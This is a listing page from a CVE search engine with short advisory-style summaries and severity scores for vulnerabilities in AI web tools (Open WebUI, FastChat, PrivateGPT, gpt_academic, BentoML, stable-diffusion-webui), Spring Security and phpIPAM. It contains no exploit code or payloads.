CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

Vulnrichment•added 2025/03/20 10:10 a.m.•5 views

CVE-2024-7044 Stored XSS in open-webui/open-webui

6.8CVSS5.9AI score0.00444EPSS

CVE•added 2025/03/20 10:10 a.m.•44 views

CVE-2024-7044

Open WebUI vulnerable to Stored XSS (CVE-2024-7044) in open-webui/open-webui v0.3.8 via chat file upload. An attacker can inject malicious content into a file that, when accessed by a victim (via URL or shared chat), executes JavaScript in the browser, enabling user data theft, session hijacking,...

8.9CVSS5.9AI score0.00444EPSS

Cvelist•added 2025/03/20 10:9 a.m.•8 views

CVE-2024-10908 Open Redirect in lm-sys/fastchat

An open redirect vulnerability in lm-sys/fastchat Release v0.2.36 allows a remote unauthenticated attacker to redirect users to arbitrary websites via a specially crafted URL. This can be exploited for phishing attacks, malware distribution, and credential theft...

6.1CVSS0.00731EPSS

Vulnrichment•added 2025/03/20 10:9 a.m.•4 views

CVE-2024-10908 Open Redirect in lm-sys/fastchat

6.1CVSS6.3AI score0.00731EPSS

CVE•added 2025/03/20 10:9 a.m.•67 views

CVE-2024-10908

The CVE-2024-10908 entry describes an open redirect vulnerability in lm-sys/fastchat release 0.2.36. The issue allows remote, unauthenticated attackers to redirect users to arbitrary URLs, enabling phishing, malware distribution, and credential theft. Affected component: lm-sys/fastchat, version ...

6.1CVSS6.3AI score0.00731EPSS

CVE•added 2025/03/20 10:9 a.m.•65 views

CVE-2024-12760

CVE-2024-12760 is associated with BentoML v1.3.9, where the /ui/gradio_api/file= endpoint’s file parameter can be manipulated to perform an open redirect to attacker-controlled URLs. The open redirect could enable phishing or user redirection to malicious sites. Remediation: update BentoML to a v...

6.3AI score

Cvelist•added 2025/03/20 10:9 a.m.•9 views

CVE-2024-12760

...

Vulnrichment•added 2025/03/20 10:9 a.m.•6 views

CVE-2024-12760

...

6.2AI score

Cvelist•added 2025/03/20 10:9 a.m.•12 views

CVE-2024-11044 Open Redirect in automatic1111/stable-diffusion-webui

An open redirect vulnerability in automatic1111/stable-diffusion-webui version 1.10.0 allows a remote unauthenticated attacker to redirect users to arbitrary websites via a specially crafted URL. This vulnerability can be exploited to conduct phishing attacks, distribute malware, and steal user...

6.1CVSS0.00781EPSS

Vulnrichment•added 2025/03/20 10:9 a.m.•8 views

CVE-2024-10812 Open Redirect in binary-husky/gpt_academic

An open redirect vulnerability exists in binary-husky/gptacademic version 3.83. The vulnerability occurs when a user is redirected to a URL specified by user-controlled input in the 'file' parameter without proper validation or sanitization. This can be exploited by attackers to conduct phishing...

6.1CVSS6.2AI score0.00545EPSS

CVE•added 2025/03/20 10:9 a.m.•80 views

CVE-2024-10812

CVE-2024-10812 affects binary-husky/gpt_academic (v3.83) with an open redirect via the file parameter. The Nuclei template for GPT Academic v1.3.9 confirms the issue arises from user-controlled input that redirects to attacker-controlled URLs, enabling phishing, malware distribution, and credenti...

6.1CVSS6.2AI score0.00545EPSS

Cvelist•added 2025/03/20 10:9 a.m.•8 views

CVE-2024-10812 Open Redirect in binary-husky/gpt_academic

6.1CVSS0.00545EPSS

Vulnrichment•added 2025/03/20 10:9 a.m.•5 views

CVE-2024-8029 Stored XSS in imartinez/privategpt

An XSS vulnerability was discovered in the upload files process of imartinez/privategpt v0.5.0. Attackers can upload malicious SVG files, which execute JavaScript when victims click on the file link. This can lead to user data theft, session hijacking, malware distribution, and phishing attacks...

4.7CVSS4.8AI score0.00306EPSS

CVE•added 2025/03/20 10:9 a.m.•43 views

CVE-2024-8029

CVE-2024-8029 applies to imartinez/privategpt v0.5.0 and is a Stored XSS in the file upload path. The root cause is the ability to upload SVG files that contain JavaScript, which is executed when a user clicks the link, enabling data theft, session hijacking, malware distribution, or phishing as ...

6.1CVSS6.2AI score0.00306EPSS

vulnersOsv•added 2025/03/20 6:31 a.m.•7 views

cc.chensoul.nacos:nacos-distribution (=2.5.2), cn.sparrowmini:sparrow-org-service (=0.0.1) +618 more potentially affected by CVE-2025-22228 via org.springframework.security:spring-security-crypto (>=5.8.0 <=5.8.16)

org.springframework.security:spring-security-crypto MAVEN version =5.8.0, =3.0.0, =3.0.0, =3.0.0, =3.0.0, =3.0.0, =3.0.0, =3.0.0, =3.0.0, =3.0.0, =3.0.0, =3.0.0, =3.0.0, =3.0.1 and more Source cves: CVE-2025-22228 Source advisory: OSV:GHSA-MG83-C7GQ-RV5Chttp...

7.4CVSS7.3AI score0.00522EPSS

CNNVD•added 2025/03/20 12:0 a.m.•3 views

phpIPAM 跨站脚本漏洞

phpIPAM is the phpIPAM open source set of open source PHP and MySQL based IP address management applications IPAM. A cross-site scripting vulnerability exists in phpIPAM version 1.5.2, which stems from a stored cross-site scripting vulnerability in the Description field of the custom field in the...

5.4CVSS4.3AI score0.00293EPSS

Exploits1References3

CNNVD•added 2025/03/20 12:0 a.m.•2 views

GPT Academic 输入验证错误漏洞

GPT Academic is an interface that provides pragmatic interactions for LLM grand language models such as GPT/GLM. GPT Academic suffers from an open redirection vulnerability that originates from a user redirecting to a URL specified by the user-controlled file parameter without proper validation o...

6.1CVSS6.8AI score0.00545EPSS

CNNVD•added 2025/03/20 12:0 a.m.•2 views

FastChat 输入验证错误漏洞

FastChat is an open platform from LMSYS for training, deploying, and evaluating chatbots based on large language models. An input validation error vulnerability exists in FastChat version v0.2.36, which stems from an open redirection vulnerability that could lead to phishing attacks, malware...

6.1CVSS6.1AI score0.00731EPSS